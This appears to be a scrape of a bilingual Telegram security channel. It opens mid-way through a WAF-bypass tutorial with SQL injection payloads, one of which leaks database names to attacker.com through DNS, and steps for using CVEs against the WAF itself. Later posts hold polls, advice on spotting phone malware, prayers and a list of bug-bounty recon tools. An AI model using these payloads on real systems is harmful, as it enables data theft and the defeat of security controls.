SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\', database()));

or

SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);

If the WAF does not filter outbound traffic, the database information might be leaked via DNS requests.


---

7. Finding WAF Vulnerabilities (CVE Exploits)

The ultimate method for bypassing a WAF is to find vulnerabilities in the WAF itself.

Steps:

1. Identify the WAF using tools like WAFW00F:

wafw00f http://target.com


2. Search for CVEs related to that WAF.


3. Exploit known vulnerabilities to bypass or disable the WAF.



For example, if the target is using an outdated version of a cloud-based WAF, you might find a known CVE that allows bypassing its protection.


---

Conclusion

WAF bypassing is an ongoing challenge that requires creativity and persistence. Combining multiple techniques often yields the best results.

If one method doesn't work, try another approachโ€”because thereโ€™s always a way!

Would you like me to help you turn this into a video script or add more advanced techniques?
โค1
ุชุญุจ ู…ุญุชูˆูŠ ุจูƒุฑู‡ ูŠูƒูˆู† ุงูŠ : What do you want the content to be
Anonymous Poll
63%
Red team : ูุฑูŠู‚ ุงู„ู‡ุฌูˆู…
17%
Blue team : ูุฑูŠู‚ ุงู„ุฏูุงุน
20%
Ai : ุฐูƒุงุก ุงุตุทู†ุงุนูŠ
โค3
ุงุฒุงูŠ ุงุนุฑู ุงู†ูŠ ู…ุฎุชุฑู‚


ุบุงู„ุจู‹ุง ุงู„ู‡ุงุชู ุจูŠุนู„ู‚ ู„ุฃู† ุจุนุถ ุงู„ุชุทุจูŠู‚ุงุช ุจุชุณุชู‡ู„ูƒ ูƒู…ูŠุฉ ูƒุจูŠุฑุฉ ู…ู† ุงู„ุฅู†ุชุฑู†ุช. ู„ุญู„ ุงู„ู…ุดูƒู„ุฉ ุฏูŠุŒ ูŠูุณุชุญุณู† ุชุญู…ูŠู„ ุชุทุจูŠู‚ ุฒูŠ GlassWire ุนู„ุดุงู† ุชุฑุงู‚ุจ ุงุณุชู‡ู„ุงูƒ ุงู„ุจูŠุงู†ุงุช. ู„ูˆ ู„ุงุญุธุช ุฅู† ููŠ ุชุทุจูŠู‚ ุจูŠุณุชู‡ู„ูƒ ุจูŠุงู†ุงุช ุจุดูƒู„ ุบูŠุฑ ุทุจูŠุนูŠ ู…ู† ุบูŠุฑ ุณุจุจ ูˆุงุถุญุŒ ุฏู‡ ู…ู…ูƒู† ูŠูƒูˆู† ุจุณุจุจ ุจุฑู†ุงู…ุฌ ุถุงุฑ ุจูŠุฑุชุจุท ุจุงู„ุฅู†ุชุฑู†ุช.

ู„ูˆ ู„ู‚ูŠุช ุชุทุจูŠู‚ ุบุฑูŠุจุŒ ุงุฏุฎู„ ุนู„ู‰ ุฅุนุฏุงุฏุงุช ุงู„ู‡ุงุชู ุนู„ุดุงู† ุชุฏูˆุฑ ุนู„ูŠู‡. ู„ูŠู‡ุŸ ู„ุฃู† ุจุนุถ ุงู„ุจุฑุงู…ุฌ ุงู„ุถุงุฑุฉ ุจุชูƒูˆู† ู…ุฎููŠุฉุŒ ุฒูŠ ู…ุง ู…ู…ูƒู† ุชู„ุงู‚ูŠ ุชุทุจูŠู‚ ู…ุงู„ูˆุด ุงุณู… ุฃูˆ ุตูˆุฑุฉ. ููŠ ุงู„ุญุงู„ุฉ ุฏูŠุŒ ู„ุงุฒู… ุชู…ุณุญู‡

ุจุนุถ ุงู„ุชุทุจูŠู‚ุงุช ู…ุด ุฏุงูŠู…ู‹ุง ู…ุตู…ู…ุฉ ุนู„ุดุงู† ุชุณุฑู‚ ู…ู„ูุงุชูƒุŒ ู„ูƒู†ู‡ุง ู…ู…ูƒู† ุชุนุฑุถ ุฅุนู„ุงู†ุงุช ุจุดูƒู„ ู…ูุฑุทุŒ ุญุชู‰ ูˆุงู†ุช ู…ุด ูุงุชุญ ุงู„ุชุทุจูŠู‚. ุงู„ู‡ุฏู ู…ู† ุงู„ุฅุนู„ุงู†ุงุช ุฏูŠ ุบุงู„ุจู‹ุง ุจูŠูƒูˆู† ุงู„ุฑุจุญ ุงู„ู…ุงุฏูŠ. ู„ูˆ ุจุฏุฃุช ุชู„ุงู‚ูŠ ุฅุนู„ุงู†ุงุช ุนุดูˆุงุฆูŠุฉ ููŠ ูˆุงุฌู‡ุฉ ุงู„ู‡ุงุชู ู…ู† ุบูŠุฑ ุณุจุจุŒ ุฏูŠ ุนู„ุงู…ุฉ ูˆุงุถุญุฉ ุฅู† ููŠ ุจุฑู†ุงู…ุฌ ุถุงุฑ ุนู„ู‰ ุฌู‡ุงุฒูƒ.
https://t.me/SpiderCodeCommunity1

ูƒุชุงุจู‡ : @Gg22rf โค๏ธ
๐Ÿ‘Œ2
ุงู„ู„ู‘ู‡ู… ูƒูู† ู„ุฃู‡ู„ ุบุฒุฉ ุนูˆู†ู‹ุง ูˆู†ุตูŠุฑู‹ุงุŒ ูˆุจุฏู‘ู„ ุฎูˆูู‡ู… ุฃู…ู†ู‹ุง.
ุงู„ู„ู‘ู‡ู… ุงุฌุนู„ ู„ุฃู‡ู„ ุบุฒุฉ ุงู„ู†ุตุฑุฉ ูˆุงู„ุนุฒุฉ ูˆุงู„ุบู„ุจุฉ ูˆุงู„ู‚ูˆุฉ ูˆุงู„ู‡ูŠุจุฉ.
ุชุนุฒ ุนู„ูŠู†ุง ุบุฒุฉ ..ูŠุนุฒ ุนู„ูŠู†ุง ุนุฒุงุคู‡ุง.. ุงู„ู„ู‘ู‡ู… ุบุฒุฉ ุญุชู‰ ุชุทู…ุฆู†.
ุงู„ู„ู‘ู‡ู… ุฅู†ู‘ ุบุฒุฉ ููŠ ุญูู…ุงูƒ ู„ุง ุญูู…ู‰ ู„ู‡ุง ุณููˆุงูƒ.
ุงู„ู„ู‘ู‡ู… ู†ุณุฃู„ูƒ ู†ูุญุฉ ู…ู† ู†ูุญุงุช ุฑุญู…ุชููƒ ุชู„ูƒ ุงู„ุชูŠ ู„ุง ุชูุจู‚ูŠ ุจุคุณู‹ุง ุŒ ูˆู„ุง ุญุฒู†ู‹ุง ุŒ ูˆู„ุง ุถูŠู‚ู‹ุง ุŒ ูˆู„ุง ูŠุฃุณู‹ุง ุฃุชุช ุนู„ูŠู‡ ุฅู„ุง ุฌุนู„ุชู‡ ูุฑุฌู‹ุง ูˆูุฑุญู‹ุง ูŠุง ุงู„ู„ู‡ ... ‏ูŠุงุฑุจ ุจูƒ ุชุทูŠุจู ุงู„ุฎูˆุงุทุฑ ูˆู…ู† ุนู†ุฏูƒ ุชุชุญู‚ู‘ู‚ ุงู„ุฃู…ู†ูŠุงุช ุงุณุชูˆุฏุนู†ุงูƒ ุดูŠุฆุงู‹ ููŠ ุฎูˆุงุทุฑู†ุง ุ› ูุญู‚ู‚ู‡ ู„ู†ุง ูŠุง ุฑุจ ุงู„ุนุงู„ู…ูŠู†‏.
๐Ÿ•Š3
Forwarded from SPIDER SECURITY
ุจูƒุฑู‡ ุงูˆู„ ูŠูˆู… ู…ู† ู„ูŠู„ู‡ ุงู„ู‚ุฏุฑ ู„ูŠู„ู‡ ุงู„ู‚ุฏุฑ ู…ู…ูƒู† ุชูƒูˆู† ู…ู† ุงุฎุฑ ุนุดุฑ ุชูŠุงู… ๐Ÿ™Œ๐Ÿป
โค3
ุนุดุงู† ุจุตุฑุงุญู‡ ู…ุญุชุงุฑ ุงู†ุฒู„ ุงูŠ
Anonymous Poll
13%
CVE
33%
Roadmap
54%
Bug bounty tools for web
ุจ ู…ู†ุงุณุจู‡ ูˆุตูˆู„ู†ุง ู„ 140 ู‡ู†ุฒู„ ู„ูŠูƒู… ุงูุถู„ ุงุฏูˆุงุช ุฑูŠูƒูˆู†


Spider Tools

-----------------------

spider recon

----------------------



1 -  Amass


2 - Subfinder


3 - Assetfinder


4 - Shodan.io.com


5 -Censys.com


6 - Waybackurls


7 - Hakrawler


8 - Nmap ( ุฎู„ูŠู‡ุง ุชูุญุต ูƒู„ ุงู„ุฑูˆุงุจุท ู ู…ู„ู )


9 - naabu


10 - httpx ( ุนู„ุดุงู† ุชุดูˆู ุงู„ุฑูˆุงุจุท ุงู„ุดุบุงู„ู‡  )


11 - WhatWeb


12 - Wappalyzer ( ุงุถุงูู‡ ููŠ ูุงูŠุฑ ููˆูƒุณ )


13 - Dirsearch


14 - Arjun


15 - fuff ( ู„ุฒู…ูƒ ุงุณูƒุฑุจุช ู„ูŠู‡ุง )


16 - wfuzz ( ุฒูŠ fuff  )


17 - Burp Suite pro
โ˜๐Ÿปโ˜๐Ÿปโ˜๐Ÿปโ˜๐Ÿปโ˜๐Ÿป
( ุถูŠู extension ุงู„ู…ูˆุฌูˆุฏู‡ ู ู…ุชุฌุฑ ุงู„ุจุฑุจ ุงุฎุชุงุฑ ุงู„ ุฎู…ุณ ู†ุฌูˆู… ู…ู†ู‡ู… ูˆ ุถูŠู burp bounty free ูˆ ุญุท ุงุณูƒุฑุจุชุงุช burp bounty pro )


18 - zap proxy


19 - Wireshark


20 - feroxbuster


21 - Knockpy


22 - Gobuster ( ุฒูŠ fuff )


23 -builtwith.com


24 - nuclei


25 - xsrfprobe


26 - webpwn3r ( ุจุชุงุนุช ุงุจุฑุงู‡ูŠู… ุญุฌุงุฒูŠ )


27 - RED_HAWK

28 - gbounty

(  Spider Osint  )



29 - maltego


30 - Spiderfoot



| Spider exploit |



31 - SQLmap


32 - metasploit


33 - XSStrike

34 - wpscan

35 -https://github.com/vavkamil/awesome-bugbounty-tools
โ˜๐Ÿปโ˜๐Ÿปโ˜๐Ÿปโ˜๐Ÿปโ˜๐Ÿป
( ุฏูˆู„ ุงุฏูˆุงุช ุฒูŠุงุฏู‡ ุนุดุงู† ู„ูˆ ููŠ ุซุบุฑู‡ ู„ู‚ูŠุชู‡ุง ูˆ ู„ุงุฏูˆุงุช ู…ุด ู†ุงูุนู‡ ู…ุนูƒ  )
On the occasion of reaching 140, Iโ€™m sharing with you the best reconnaissance tools!

Spider Tools


---

Spider Recon


---

1 - Amass
2 - Subfinder
3 - Assetfinder
4 - Shodan.io
5 - Censys.com
6 - Waybackurls
7 - Hakrawler
8 - Nmap (Make it scan all URLs in a file)
9 - Naabu
10 - Httpx (To check for live URLs)
11 - WhatWeb
12 - Wappalyzer (Firefox extension)
13 - Dirsearch
14 - Arjun
15 - Ffuf (Youโ€™ll need a script for it)
16 - Wfuzz (Similar to Ffuf)
17 - Burp Suite Pro
โ˜๐Ÿปโ˜๐Ÿปโ˜๐Ÿปโ˜๐Ÿปโ˜๐Ÿป
(Add the extensions from the Burp store, choose the five-star ones, add Burp Bounty Free, and import Burp Bounty Pro scripts.)
18 - ZAP Proxy
19 - Wireshark
20 - Feroxbuster
21 - Knockpy
22 - Gobuster (Similar to Ffuf)
23 - BuiltWith.com
24 - Nuclei
25 - XSRFProbe
26 - WebPwn3r (By Ibrahim Hegazy)
27 - RED_HAWK
28 - GBounty

Spider OSINT

29 - Maltego
30 - SpiderFoot

Spider Exploit

31 - SQLmap
32 - Metasploit
33 - XSStrike
34 - WPScan
35 - Awesome Bug Bounty Tools
โ˜๐Ÿปโ˜๐Ÿปโ˜๐Ÿปโ˜๐Ÿปโ˜๐Ÿป
(Additional tools in case you find a vulnerability and need extra resources.)